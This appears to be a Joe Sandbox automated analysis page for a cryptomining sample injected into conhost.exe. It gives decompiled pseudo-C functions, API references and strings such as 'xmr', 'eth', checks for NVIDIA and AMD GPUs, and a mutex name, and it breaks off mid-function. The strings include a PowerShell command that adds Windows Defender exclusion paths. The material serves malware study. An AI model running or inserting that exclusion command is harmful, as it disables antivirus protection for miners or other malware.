
Uniqueness Score: -1.00%

Function 00007FF67EEC1EB0 Relevance: 37.2, APIs: 9, Strings: 12, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF67EEC1F3B
wcslen.MSVCRT ref: 00007FF67EEC20A0
memcpy.MSVCRT ref: 00007FF67EEC20BF
memcpy.MSVCRT ref: 00007FF67EEC20E0
wcslen.MSVCRT ref: 00007FF67EEC2353

Strings

PROGRAMFILES=, xrefs: 00007FF67EEC1EB6
$0', xrefs: 00007FF67EEC26BC
ATI, xrefs: 00007FF67EEC27A2
ProviderName, xrefs: 00007FF67EEC234C
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 00007FF67EEC20B1
AMD, xrefs: 00007FF67EEC271C
NVIDIA, xrefs: 00007FF67EEC2696
Advanced Micro Devices, xrefs: 00007FF67EEC290C
@, xrefs: 00007FF67EEC2499
0, xrefs: 00007FF67EEC256C
ProviderName, xrefs: 00007FF67EEC2447
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 00007FF67EEC1EF9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0'$0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$PROGRAMFILES=$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
API String ID: 1844840824-1551673046
Opcode ID: 55ff2768f45d7c3e1114314d57fea6ac7a64d3456e2ef9d2a61278e21b215a04
Instruction ID: 237d85287dad0e5a1bb066cd476b5035c75731d395b331366f4c08afdeea88ea
Opcode Fuzzy Hash: 55ff2768f45d7c3e1114314d57fea6ac7a64d3456e2ef9d2a61278e21b215a04
Instruction Fuzzy Hash: 25521D26D3CE8295F7129B39B8513F567A0AFA5384F045B31F98C92671FFADA18D8304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC1730 Relevance: 30.1, APIs: 10, Strings: 7, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E00007FF67FF67EEC1730(void* __ebx, void* __edi, void* __esp, void* __rcx, long long __rdx, void* __r8, long long __r9, long long _a16, intOrPtr _a36, long long _a40, intOrPtr _a44) {
				long long _v624;
				char _v648;
				long long _v736;
				long long _v744;
				long long _v756;
				long long _v764;
				char _v768;
				char _v772;
				long long _v776;
				long long _v784;
				long long _v788;
				long long _v792;
				char _v800;
				char _v808;
				long long _v812;
				long long _v816;
				long long _v824;
				short _v826;
				long long _v836;
				long long _v848;
				signed int _v856;
				signed int _v860;
				long long _v872;
				long long _v884;
				long long _v900;
				long long _v908;
				long long _v916;
				intOrPtr _v924;
				long long _v928;
				intOrPtr _v932;
				long long _v936;
				long long _v940;
				long long _v948;
				void* _t104;
				signed short _t109;
				void* _t114;
				void* _t144;
				void* _t181;
				long long _t182;
				long long _t183;
				long long _t184;
				long long _t185;
				long long _t186;
				long long _t189;
				long long _t193;
				void* _t232;
				long long _t234;
				intOrPtr* _t254;
				void* _t255;

				asm("movaps [esp+0x350], xmm6");
				asm("movaps [esp+0x360], xmm7");
				asm("inc esp");
				_a16 = __rdx;
				_v824 = 0;
				r8d = 0;
				_v816 = 0;
				_v808 = 0;
				goto 0x7eec17e5;
				r8d = 0;
				_v928 = 4;
				_v936 = 0x3000;
				E00007FF67FF67EEC403D(0, _t181, 0xffffffff, __r8);
				_t104 = E00007FF67FF67EEC40D9(0, _t181, 0xffffffff, _v808); // executed
				if (_t104 == 0xc0000004) goto 0x7eec17b0;
				if (_t104 < 0) goto 0x7eec1e40;
				_t182 =  &_v744;
				r15d = 0;
				asm("inc sp");
				asm("movdqa xmm7, [0x1c301]");
				_v872 = _t182;
				_t234 =  &_v648;
				asm("movdqa xmm6, [0x1c2bc]");
				goto 0x7eec1860;
				asm("o16 nop [cs:eax+eax]");
				if ( *_t254 == 0) goto 0x7eec19a0;
				r15d = _t232 + _t182;
				if (_t254 - _v808 >= 0) goto 0x7eec19a0;
				_t255 = _t254 + _v816;
				if ( *((short*)(_t255 + 0x38)) == 0) goto 0x7eec1840;
				if ( *0x7eee4e00 != 0) goto 0x7eec18b6;
				_t183 =  *0x7eeddb00; // 0x40017000400cd
				r9d = 0x9f;
				 *0x7eee4e2a = 1;
				asm("movaps [0x23575], xmm6");
				 *0x7eee4e28 = r9w;
				 *0x7eee4e00 = 1;
				 *0x7eee4e20 = _t183;
				E00007FF67FF67EEC14F0( *_t254, _t183);
				if ( *0x7eee4e2a == 0) goto 0x7eec191c;
				asm("movdqa xmm0, [0x23549]");
				 *0x7eee4e2a = 0;
				asm("movq xmm1, [0x1c233]");
				asm("inc cx");
				asm("pand xmm0, xmm7");
				asm("movaps [0x23523], xmm0");
				asm("movq xmm0, [0x2352b]");
				asm("paddw xmm0, xmm1");
				asm("movq xmm1, [0x1c21b]");
				_t109 = ( *0x7eee4e28 & 0x0000ffff) + 0x00004361 & 0x000000ff;
				 *0x7eee4e28 = _t109;
				asm("pand xmm0, xmm1");
				asm("movq [0x23504], xmm0");
				r8d = 0xc;
				0x7eed66f0();
				if (_t109 != 0) goto 0x7eec1840;
				asm("pxor xmm0, xmm0");
				asm("movups [esp+0x148], xmm0");
				asm("movaps [esp+0x160], xmm0");
				_v736 = 0;
				_t184 =  *((intOrPtr*)(_t255 + 0x50));
				_v648 = 0x30;
				_v624 = 0;
				_v744 = _t184;
				if (E00007FF67FF67EEC406D(0x80, _t184,  &_v824, _t234) < 0) goto 0x7eec1840;
				r9d = 0x8000;
				E00007FF67FF67EEC4055(0x80, _t184, 0xffffffff,  &_v808); // executed
				if (_v824 == 0) goto 0x7eec1e90;
				_v800 = 0;
				E00007FF67FF67EEC3C60(E00007FF67FF67EEC4088(1, _t184, 0xffffffff,  &_v800));
				r8d = 0x210;
				_t114 = memset(??, ??, ??);
				_t185 =  *0x7eeddb30; // 0x300e600e60003
				r8d = 0xa7;
				_v736 = r8w;
				_v744 = _t185;
				if ( *0x7eee4de8 != 0) goto 0x7eec1a61;
				_t186 = _v744;
				 *0x7eee4dfa = 1;
				 *0x7eee4df8 = 0xa7;
				 *0x7eee4de8 = 1;
				 *0x7eee4df0 = _t186;
				E00007FF67FF67EEC14F0(_t114, _t186);
				if ( *0x7eee4dfa == 0) goto 0x7eec1aaf;
				 *0x7eee4dfa = 0;
				asm("movq xmm0, [0x23370]");
				asm("movq xmm1, [0x1c0b0]");
				asm("paddw xmm0, xmm1");
				asm("movq xmm1, [0x1c088]");
				 *0x7eee4df8 = ( *0x7eee4df8 & 0x0000ffff) + 0x00001759 & 0x000000ff;
				asm("pand xmm0, xmm1");
				asm("movq [0x23341], xmm0");
				0x7eed66e0();
				E00007FF67FF67EED66D8();
				0x7eed66e8();
				if (__r9 == 0) goto 0x7eec1e18;
				0x7eed66e8();
				asm("movd xmm6, eax");
				asm("pextrw ebx, xmm6, 0x0");
				if (__r8 == 0) goto 0x7eec1e30;
				0x7eed66e8();
				r15d = _t186 + _t186;
				r15d = r15w & 0xffffffff;
				_v826 = 0;
				_v860 = 0xffffffff << 0x00000010 | r15d;
				if (_a40 == 0) goto 0x7eec1e60;
				0x7eed66e8();
				_t44 = _t186 + 1; // 0x1
				r8d = _t186 + _t44;
				_v856 = r8d;
				0x7eed66e8();
				r8d = _v856;
				_t157 = _t186 + _t186 & 0x0000ffff;
				r8d = 0;
				_v928 = 4;
				_v936 = 0x3000;
				_v856 = r8d << 0x00000010 | _t186 + _t186 & 0x0000ffff;
				_v792 = 0;
				_v848 =  &_v784;
				asm("movd xmm2, eax");
				_v784 = _t186;
				asm("pshufd xmm7, xmm2, 0xe0");
				E00007FF67FF67EEC403D(_t186 + _t186 & 0x0000ffff, _t186, 0xffffffff,  &_v800);
				r8d = 0;
				_t193 = _v792;
				asm("dec ax");
				asm("inc ecx");
				asm("movd [ebx+0x38], xmm6");
				asm("repe inc ecx");
				 *((short*)(_t193 + 0x62)) = 0x10d;
				asm("movups [ebx+0x78], xmm0");
				asm("movq [ebx], xmm7");
				asm("movups [ebx+0x50], xmm3");
				 *((intOrPtr*)(_t193 + 0x70)) = _v860;
				 *((long long*)(_t193 + 0x40)) = __r9;
				 *((short*)(_t193 + 0x60)) = _t186 + _t186;
				 *((intOrPtr*)(_t193 + 8)) = 1;
				 *(_t193 + 0xd0) = _v856;
				 *((long long*)(_t193 + 0x10)) = 0xfffffffd;
				 *((long long*)(_t193 + 0x68)) = _t234;
				_v776 = 0;
				 *((long long*)(_t193 + 0xd8)) = _a40;
				_v768 = 0x60;
				 *((long long*)(_t193 + 0x3f0)) =  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x20)) + 0x3f0));
				memset(__edi, 0, 0xa << 0);
				_v940 = 4;
				_v948 = 0x3000;
				_v756 = 0x58;
				E00007FF67FF67EEC403D(_t186 + _t186 & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x20)) + 0x3f0)), 0xffffffff,  &_v800);
				asm("dec ax");
				r9d = 0x1fffff;
				_t189 = _v788;
				r8d = 0x1fffff;
				_v764 = 0;
				asm("movdqa xmm0, [0x1be31]");
				asm("movups [eax], xmm0");
				asm("dec ax");
				 *((long long*)(_t189 + 0x38)) = _v836;
				asm("punpcklqdq xmm0, xmm4");
				asm("movups [eax+0x10], xmm0");
				asm("movdqa xmm0, [0x1be1d]");
				asm("movups [eax+0x28], xmm0");
				asm("movdqa xmm0, [0x1be21]");
				 *((long long*)(_t189 + 0x58)) = _v812;
				asm("movups [eax+0x48], xmm0");
				_v900 = _t189;
				_v916 = _t193;
				_v940 = 0;
				_v948 = 0;
				_v908 = _v884;
				_v924 = _a44;
				_v932 = _a36;
				E00007FF67FF67EEC4079(_t186 + _t186 & 0x0000ffff, _v884,  &_v772,  &_v800); // executed
				r9d = 0x8000;
				E00007FF67FF67EEC4055(_t186 + _t186 & 0x0000ffff, _v884, 0xffffffff, _v860); // executed
				r9d = 0x8000;
				_t144 = E00007FF67FF67EEC4055(_t157, _v884, 0xffffffff,  &_v768); // executed
				asm("movq xmm0, [esp+0xd0]");
				 *((long long*)(__rcx + 0x10)) = 0;
				asm("movhps xmm0, [esp+0xd8]");
				asm("inc ecx");
				asm("movaps xmm6, [esp+0x350]");
				asm("movaps xmm7, [esp+0x360]");
				asm("inc esp");
				return _t144;
			}

0x7ff67eec1743
0x7ff67eec174b
0x7ff67eec1753
0x7ff67eec175c
0x7ff67eec176d
0x7ff67eec1783
0x7ff67eec1786
0x7ff67eec179a
0x7ff67eec17a6
0x7ff67eec17b0
0x7ff67eec17b9
0x7ff67eec17c1
0x7ff67eec17d0
0x7ff67eec17ed
0x7ff67eec17f7
0x7ff67eec17fb
0x7ff67eec1801
0x7ff67eec180b
0x7ff67eec180e
0x7ff67eec1817
0x7ff67eec181f
0x7ff67eec1824
0x7ff67eec182c
0x7ff67eec1834
0x7ff67eec1836
0x7ff67eec1845
0x7ff67eec184b
0x7ff67eec185a
0x7ff67eec1860
0x7ff67eec186e
0x7ff67eec1877
0x7ff67eec1879
0x7ff67eec1880
0x7ff67eec1886
0x7ff67eec1894
0x7ff67eec189b
0x7ff67eec18a3
0x7ff67eec18aa
0x7ff67eec18b1
0x7ff67eec18bd
0x7ff67eec18bf
0x7ff67eec18c7
0x7ff67eec18d5
0x7ff67eec18dd
0x7ff67eec18e2
0x7ff67eec18e6
0x7ff67eec18ed
0x7ff67eec18f5
0x7ff67eec18fd
0x7ff67eec1905
0x7ff67eec1909
0x7ff67eec1910
0x7ff67eec1914
0x7ff67eec1920
0x7ff67eec192d
0x7ff67eec1934
0x7ff67eec193a
0x7ff67eec1943
0x7ff67eec1953
0x7ff67eec1963
0x7ff67eec196f
0x7ff67eec1973
0x7ff67eec197e
0x7ff67eec1989
0x7ff67eec1998
0x7ff67eec19a0
0x7ff67eec19b3
0x7ff67eec19c1
0x7ff67eec19db
0x7ff67eec19ec
0x7ff67eec19f1
0x7ff67eec1a00
0x7ff67eec1a05
0x7ff67eec1a0c
0x7ff67eec1a12
0x7ff67eec1a22
0x7ff67eec1a2a
0x7ff67eec1a2c
0x7ff67eec1a39
0x7ff67eec1a40
0x7ff67eec1a4e
0x7ff67eec1a55
0x7ff67eec1a5c
0x7ff67eec1a68
0x7ff67eec1a71
0x7ff67eec1a78
0x7ff67eec1a80
0x7ff67eec1a88
0x7ff67eec1a90
0x7ff67eec1a9c
0x7ff67eec1aa3
0x7ff67eec1aa7
0x7ff67eec1ab9
0x7ff67eec1ac9
0x7ff67eec1ad1
0x7ff67eec1adc
0x7ff67eec1ae5
0x7ff67eec1af7
0x7ff67eec1afb
0x7ff67eec1b00
0x7ff67eec1b09
0x7ff67eec1b0e
0x7ff67eec1b1a
0x7ff67eec1b23
0x7ff67eec1b34
0x7ff67eec1b38
0x7ff67eec1b46
0x7ff67eec1b53
0x7ff67eec1b53
0x7ff67eec1b58
0x7ff67eec1b5d
0x7ff67eec1b62
0x7ff67eec1b72
0x7ff67eec1b75
0x7ff67eec1b7b
0x7ff67eec1b85
0x7ff67eec1b8d
0x7ff67eec1ba2
0x7ff67eec1bbe
0x7ff67eec1bcd
0x7ff67eec1bd4
0x7ff67eec1bdc
0x7ff67eec1be1
0x7ff67eec1beb
0x7ff67eec1bee
0x7ff67eec1bf6
0x7ff67eec1c08
0x7ff67eec1c10
0x7ff67eec1c15
0x7ff67eec1c1b
0x7ff67eec1c23
0x7ff67eec1c27
0x7ff67eec1c2b
0x7ff67eec1c2f
0x7ff67eec1c36
0x7ff67eec1c42
0x7ff67eec1c4c
0x7ff67eec1c53
0x7ff67eec1c61
0x7ff67eec1c69
0x7ff67eec1c6d
0x7ff67eec1c79
0x7ff67eec1c87
0x7ff67eec1c93
0x7ff67eec1c9c
0x7ff67eec1ca7
0x7ff67eec1cb9
0x7ff67eec1cc1
0x7ff67eec1ccd
0x7ff67eec1cd2
0x7ff67eec1cd7
0x7ff67eec1cdd
0x7ff67eec1cf5
0x7ff67eec1cfb
0x7ff67eec1d07
0x7ff67eec1d0f
0x7ff67eec1d12
0x7ff67eec1d17
0x7ff67eec1d1b
0x7ff67eec1d27
0x7ff67eec1d2b
0x7ff67eec1d33
0x7ff67eec1d37
0x7ff67eec1d3f
0x7ff67eec1d4b
0x7ff67eec1d4f
0x7ff67eec1d59
0x7ff67eec1d5e
0x7ff67eec1d67
0x7ff67eec1d70
0x7ff67eec1d7c
0x7ff67eec1d87
0x7ff67eec1d8b
0x7ff67eec1d98
0x7ff67eec1da5
0x7ff67eec1daa
0x7ff67eec1dbd
0x7ff67eec1dc5
0x7ff67eec1dce
0x7ff67eec1dd7
0x7ff67eec1ddf
0x7ff67eec1de4
0x7ff67eec1dec
0x7ff67eec1df4
0x7ff67eec1e10

APIs

wcsncmp.MSVCRT ref: 00007FF67EEC192D
memset.MSVCRT ref: 00007FF67EEC1A00

Strings

`, xrefs: 00007FF67EEC1C87
0, xrefs: 00007FF67EEC1973
X, xrefs: 00007FF67EEC1CC1
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF67EEC1736
\??\, xrefs: 00007FF67EEC1AAF
explorer.exe, xrefs: 00007FF67EEC1926
xmr, xrefs: 00007FF67EEC1732

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$X$\??\$`$explorer.exe$xmr
API String ID: 1181335886-1782556084
Opcode ID: 498ed560a6c1c325422ea0054231794ec1753e157b8fae36b9ced3ffc415d12b
Instruction ID: 15bfa9b9b6c48e598472eb107f921ae264605999860a842f0726bec1768365ff
Opcode Fuzzy Hash: 498ed560a6c1c325422ea0054231794ec1753e157b8fae36b9ced3ffc415d12b
Instruction Fuzzy Hash: 5B027067A28BC285E321CB25E4003AA77A5FB95794F004735EAAC977E5DFBDD188C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC29A0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00007FF67FF67EEC29A0(void* __ecx, void* __eflags, void* __rax, void* __rdx, void* __r8, void* __r9, long long _a8, long long _a24, char _a40, char _a72, char _a65688) {
				long long _v0;
				long long _v8;
				void* _t14;
				void* _t15;
				void* _t19;
				void* _t20;

				_t23 = __rax;
				E00007FF67FF67EECE3E0(0x10070);
				_t30 =  &_a72;
				_t15 = __ecx;
				r8d = 0xfffe;
				memset(??, ??, ??);
				_a24 =  &_a65688;
				E00007FF67FF67EECF1E0(__ecx,  &_a72, __rdx, __r9,  &_a65688);
				_a8 = 0;
				_v0 = 0;
				_v8 = 0;
				E00007FF67FF67EEC1730(_t15, _t19, _t20,  &_a40, __r8,  &_a72, __rdx); // executed
				if (_t15 != 0) goto 0x7eec2a40;
				_t14 = E00007FF67FF67EEC3FEF(0x7fff, _t23, _a40, _t30); // executed
				return _t14;
			}

0x7ff67eec29a0
0x7ff67eec29ab
0x7ff67eec29b3
0x7ff67eec29be
0x7ff67eec29c3
0x7ff67eec29ce
0x7ff67eec29e6
0x7ff67eec29eb
0x7ff67eec29fe
0x7ff67eec2a06
0x7ff67eec2a0e
0x7ff67eec2a17
0x7ff67eec2a23
0x7ff67eec2a28
0x7ff67eec2a3b

APIs

memset.MSVCRT ref: 00007FF67EEC29CE

Part of subcall function 00007FF67EEC1730: wcsncmp.MSVCRT ref: 00007FF67EEC192D

Strings

%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF67EEC29AA
eth, xrefs: 00007FF67EEC29A8
\BaseNamedObjects\wjsosmooouyuvnjx, xrefs: 00007FF67EEC29A7

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$\BaseNamedObjects\wjsosmooouyuvnjx$eth
API String ID: 1181335886-2188963381
Opcode ID: 85434505e6ce41c0810521aa58b430e930bb390cc1372dcecd3fae18aa0bbd70
Instruction ID: 1aabc131c5d02b64eaff8729a6952b3bd16df29190a8b1d252ffa59c13c78082
Opcode Fuzzy Hash: 85434505e6ce41c0810521aa58b430e930bb390cc1372dcecd3fae18aa0bbd70
Instruction Fuzzy Hash: F101A963B2864141E220D616F8007EA6A51ABD97D0F544735FE8D43BA5CEBCD149C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC3500 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E00007FF67FF67EEC3500(long long __rcx) {
				intOrPtr _v32;
				long long _v40;
				long long _v48;
				char _v56;
				long long _v64;
				short _v70;
				char _v72;
				char _v80;
				signed int _t15;

				_v70 = 0x209;
				0x7eed66e8();
				asm("pxor xmm0, xmm0");
				_v64 = __rcx;
				_v72 = 0x412;
				asm("movaps [esp+0x60], xmm0");
				_v56 = 0x30;
				_v48 = 0;
				_v32 = 0x40;
				_v40 =  &_v72;
				_v80 = 0;
				_t15 = E00007FF67FF67EEC4100(0x20000,  &_v72,  &_v80,  &_v56);
				E00007FF67FF67EEC3FEF(0x20000,  &_v72, _v80,  &_v56); // executed
				return  !_t15 >> 0x1f;
			}

0x7ff67eec350d
0x7ff67eec3512
0x7ff67eec3521
0x7ff67eec352c
0x7ff67eec3531
0x7ff67eec353b
0x7ff67eec3540
0x7ff67eec3548
0x7ff67eec3551
0x7ff67eec3559
0x7ff67eec355e
0x7ff67eec3567
0x7ff67eec3573
0x7ff67eec3584

APIs

wcslen.MSVCRT ref: 00007FF67EEC3512

Strings

%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF67EEC3500
0, xrefs: 00007FF67EEC3540
@, xrefs: 00007FF67EEC3551

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: wcslen
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$@
API String ID: 4088430540-3278736299
Opcode ID: 325adc18c3b14617d5a375281988631af7284b3eb66ab7c3aeba3b5022b0011a
Instruction ID: 87aead3ab6be46510817386aaac087d77d2d84920eb747bc9324a4ea2cd0475c
Opcode Fuzzy Hash: 325adc18c3b14617d5a375281988631af7284b3eb66ab7c3aeba3b5022b0011a
Instruction Fuzzy Hash: 8FF0816262878082E7109B60F08539FA770EBD8354F201225F79C87B6AEF7DC5948B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC2A60 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FF67FF67EEC2A60(long long __rcx) {
				intOrPtr _v48;
				long long _v56;
				long long _v64;
				char _v72;
				long long _v80;
				short _v86;
				char _v88;
				char _v96;
				void* _t16;

				if (__rcx == 0) goto 0x7eec2afa;
				_v96 = 0;
				_v86 = 0x209;
				0x7eed66e8();
				r9d = 0;
				asm("pxor xmm0, xmm0");
				_v80 = __rcx;
				_v88 = 0x412;
				_v72 = 0x30;
				_v64 = 0;
				_v48 = 0;
				_v56 =  &_v88;
				asm("movaps [esp+0x60], xmm0"); // executed
				_t16 = E00007FF67FF67EEC40BE(0x1f0001,  &_v88,  &_v96,  &_v72); // executed
				_t31 = _v96;
				if (_t16 < 0) goto 0x7eec2af5;
				_t13 = _t31 - 1; // -1
				sil = _t13 - 0xfffffffd > 0; // executed
				E00007FF67FF67EEC3FEF(0x1f0001, _t13, _v96,  &_v72); // executed
				return 1;
			}

0x7ff67eec2a6e
0x7ff67eec2a7e
0x7ff67eec2a87
0x7ff67eec2a8c
0x7ff67eec2a96
0x7ff67eec2aa5
0x7ff67eec2aa9
0x7ff67eec2aae
0x7ff67eec2ab8
0x7ff67eec2ac0
0x7ff67eec2ac9
0x7ff67eec2ad1
0x7ff67eec2ad6
0x7ff67eec2adb
0x7ff67eec2ae0
0x7ff67eec2ae7
0x7ff67eec2ae9
0x7ff67eec2af1
0x7ff67eec2af5
0x7ff67eec2b02

APIs

wcslen.MSVCRT ref: 00007FF67EEC2A8C

Strings

0, xrefs: 00007FF67EEC2AB8
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF67EEC2A61

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: wcslen
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0
API String ID: 4088430540-185994389
Opcode ID: 4637a7ddcfe42513166a66ae15ef665fe09648da584e56b98b02a9c75bc50a92
Instruction ID: 04def97a8687307ee626027c827444724803842fa3e28fb31505820aa352bc4c
Opcode Fuzzy Hash: 4637a7ddcfe42513166a66ae15ef665fe09648da584e56b98b02a9c75bc50a92
Instruction Fuzzy Hash: 1101D62362868081E7109B54F45179BB760EFC4364F640321FA9C46BE9DFBEC5858740

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF67EED3DF0 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1288
COMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E00007FF67FF67EED3DF0(signed int __rax, void* __rbx, intOrPtr* __rcx, void* __rdi, signed int* __rsi, void* __r10, void* __r12) {
				signed int _t432;
				void* _t435;
				signed int _t436;
				signed int _t451;
				signed int _t453;
				signed int _t466;
				signed int _t470;
				signed int _t474;
				signed int _t492;
				signed int _t493;
				signed int _t507;
				signed int _t518;
				unsigned int _t538;
				intOrPtr _t541;
				signed char _t557;
				signed int _t569;
				signed int _t574;
				signed int _t588;
				unsigned int _t590;
				signed int _t592;
				signed int _t594;
				signed int _t596;
				unsigned int _t602;
				signed int _t616;
				signed int _t624;
				signed int _t648;
				signed int _t652;
				signed int _t654;
				signed int _t668;
				signed int _t675;
				signed int _t676;
				intOrPtr _t677;
				unsigned int _t679;
				signed int _t680;
				unsigned int _t682;
				void* _t698;
				void* _t704;
				signed int _t719;
				void* _t729;
				void* _t735;
				void* _t740;
				unsigned int _t741;
				signed int _t743;
				void* _t744;
				void* _t745;
				unsigned int _t746;
				void* _t749;
				unsigned int _t759;
				long long _t774;
				unsigned int _t778;
				signed int _t787;
				unsigned int _t793;
				void* _t811;
				void* _t813;
				void* _t817;
				void* _t824;
				void* _t842;
				signed int _t847;
				signed int _t848;
				void* _t852;
				void* _t859;
				signed long long _t861;
				signed long long _t863;
				signed long long _t864;
				unsigned long long _t865;
				unsigned int _t866;
				unsigned long long _t873;
				signed int _t875;
				unsigned long long _t879;
				signed int _t881;
				unsigned long long _t882;
				char* _t885;
				unsigned long long _t888;
				signed long long _t889;
				signed long long _t890;
				intOrPtr _t891;
				signed int* _t893;
				char* _t896;
				long long* _t906;
				unsigned int _t907;
				void* _t910;
				unsigned long long _t912;
				unsigned long long _t918;
				intOrPtr _t919;
				intOrPtr* _t922;
				signed long long _t926;
				signed long long _t927;
				unsigned long long _t930;
